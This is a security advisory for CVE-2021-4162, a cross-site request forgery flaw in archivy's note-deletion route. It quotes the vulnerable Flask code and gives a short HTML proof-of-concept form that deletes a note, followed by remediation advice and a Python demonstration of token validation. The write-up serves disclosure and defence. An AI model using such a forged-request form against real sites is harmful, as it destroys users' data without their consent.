Headline
CVE-2021-4162: Cross-Site Request Forgery (CSRF) in archivy
archivy is vulnerable to Cross-Site Request Forgery (CSRF)
Title
Missing CSRF token validation leads to note deletion.
Summary
The route /dataobj/delete/<int:dataobj_id> is responsible for note deletion. Instead of POST it accepts the GET and DELETE methods:
from flask import flash, redirect  # app and data are archivy's own module globals

# Deletion is a state change, yet the route answers GET (and DELETE) and
# never reads or validates a CSRF token before acting.
@app.route("/dataobj/delete/<int:dataobj_id>", methods=["DELETE", "GET"])
def delete_data(dataobj_id):
    try:
        data.delete_item(dataobj_id)
    except BaseException:
        flash("Data could not be found!", "error")
        return redirect("/")
    flash("Data deleted!", "success")
    return redirect("/")
The requests that archivy's own UI sends to this route do carry a CSRF token, but the server never verifies it. The token can therefore be left out of the request entirely, and any third-party page that makes the victim's browser request this URL deletes the note: a classic CSRF.
Steps to reproduce
- 1. Create any note and note its ID.
- 2. Open the page from PoC.html (below) in your browser with the concrete ID substituted and click the button.
- 3. Observe that the note with the specified ID has been deleted.
Proof of Concept
<!-- PoC.html -->
<form action="http://127.0.0.1:5000/dataobj/delete/{yourNoteID}" method="GET">
<input type="submit" value="Click me"/>
</form>
Possible remediation
Accept only the POST method on this route and verify the CSRF token on every request before data.delete_item is called. Marking the session cookie SameSite is a useful second layer but does not replace token validation.
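The following is an added example, not code from archivy or from this report. It models the reported route and a remediated one side by side and replays the PoC against both: Flask is replaced by a small constructed Request object so the script runs offline, and the names Request, delete_data_vulnerable, delete_data_hardened and run_scenarios are this example's own. The hardened handler implements the synchronizer-token pattern that a library such as Flask-WTF's CSRFProtect provides in a real Flask app.

```python
"""Added example (not archivy code): the delete route as reported, next to a
hardened version that accepts only POST and verifies a per-session token."""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """Stand-in for a Flask request (constructed for this example): HTTP
    method, submitted form fields, and the session selected by the cookie
    that the victim's browser attaches automatically."""
    method: str
    form: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)


def issue_csrf_token(session: dict) -> str:
    """Create, once per session, the secret the server will later demand.
    The template renders it into every state-changing form; a third-party
    page cannot read it because of the same-origin policy."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_token_valid(session: dict, submitted) -> bool:
    """Constant-time comparison of the submitted token with the session's."""
    expected = session.get("csrf_token")
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def delete_data_vulnerable(req: Request, store: dict, dataobj_id: int):
    """Mirrors the reported route: GET and DELETE are accepted and the
    csrf_token field, whether present or not, is never looked at."""
    if req.method not in ("GET", "DELETE"):
        return 405, "Method Not Allowed"
    if dataobj_id not in store:
        return 302, "Data could not be found!"
    del store[dataobj_id]
    return 302, "Data deleted!"


def delete_data_hardened(req: Request, store: dict, dataobj_id: int):
    """Remediated route: state changes only on POST, and only when the form
    carries the token that was issued to this very session."""
    if req.method != "POST":
        return 405, "Method Not Allowed"
    if not csrf_token_valid(req.session, req.form.get("csrf_token")):
        return 400, "The CSRF token is missing or invalid."
    if dataobj_id not in store:
        return 302, "Data could not be found!"
    del store[dataobj_id]
    return 302, "Data deleted!"


def run_scenarios() -> dict:
    """Replay the PoC against both handlers. The attacker's page makes the
    victim's browser send the request, so the victim's session rides along,
    but the attacker cannot supply the token.
    Returns {scenario: (http_status, note_still_present)}."""
    victim_session = {}
    token = issue_csrf_token(victim_session)
    results = {}

    def attempt(name, handler, req):
        store = {7: "my note"}  # constructed sample store: one note, ID 7
        status, _ = handler(req, store, 7)
        results[name] = (status, 7 in store)

    # PoC.html as reported: <form method="GET"> with no token at all.
    attempt("vuln_get_no_token", delete_data_vulnerable,
            Request("GET", {}, victim_session))
    attempt("hard_get_no_token", delete_data_hardened,
            Request("GET", {}, victim_session))
    # Attacker switches the PoC to method="POST", still without the token.
    attempt("hard_post_no_token", delete_data_hardened,
            Request("POST", {}, victim_session))
    # Attacker submits a guessed token: wrong value, rejected.
    attempt("hard_post_bad_token", delete_data_hardened,
            Request("POST", {"csrf_token": "guess"}, victim_session))
    # Legitimate delete button rendered by the application's own template.
    attempt("hard_post_good_token", delete_data_hardened,
            Request("POST", {"csrf_token": token}, victim_session))
    return results


if __name__ == "__main__":
    for name, (status, present) in run_scenarios().items():
        print(f"{name:22s} -> HTTP {status}, note still present: {present}")
```

Only the last scenario deletes the note under the hardened handler; the PoC form and its POST variants are all refused because the attacker's page cannot read the token stored in the victim's session. Restricting the method to POST alone is not enough (a cross-site form can POST just as easily as it can GET); it is the token check that closes the hole.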
Impact
An attacker who lures a logged-in user to a malicious page can delete any of that user's notes whose integer IDs the attacker knows or guesses, without the user's knowledge or consent.
Occurrences